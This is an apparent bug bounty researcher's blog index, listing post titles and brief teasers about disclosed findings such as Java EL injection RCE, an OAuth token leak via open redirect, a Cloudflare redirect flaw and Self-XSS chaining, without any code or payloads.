Tricky out-of-band RCE via Java EL injection

It’s been a long period of silence here. I don’t blogging much nowadays, mostly because I can’t spend much time online due to health conditions and there was nothing special in my findings which could be worth a blogpost. I decided to write if there will be some unique or less documented behavior in my findings.

… 
 

OAuth authentication bypass on Airbnb acquisition using 1-char Open Redirect

This finding was a part of Hack the World 2017 event. TL;DR: it was possible to leak Facebook access_token to the external domain, and authorize on the site on behalf of the user using this token.

 

Improving your success as bug bounty hunter

The big count of the bug bounty hunters usually does not care about their report quality. I was no exception. … 

 

How the bug on the CloudFlare «Always Online» page could lead to Unvalidated Redirect on the any site including hacker.one

Hello. This finding was closely related to the https://hackerone.com/reports/214620 , but used the flaw in the URL parsing on the CloudFlare error page. … 

 

One more way to exploit a Stored Self-XSS

Self-XSS is better than no XSS. ©Captain Obvious.

Hello. In this blog post, I will describe one more way to exploit the Self-XSS. Usually, this type of XSS is underestimated because of self-exploitation only.
However, there are a lot of ways to convert it to the good XSS. Things which can be useful in chains: … 

 

How Access Control issue in the Facebook game turned me from the dev to the security researcher

Hello. Since it is my first blog post, I’ll start my stories from the beginning – from the first bug, which made me seriously think about infosec career. …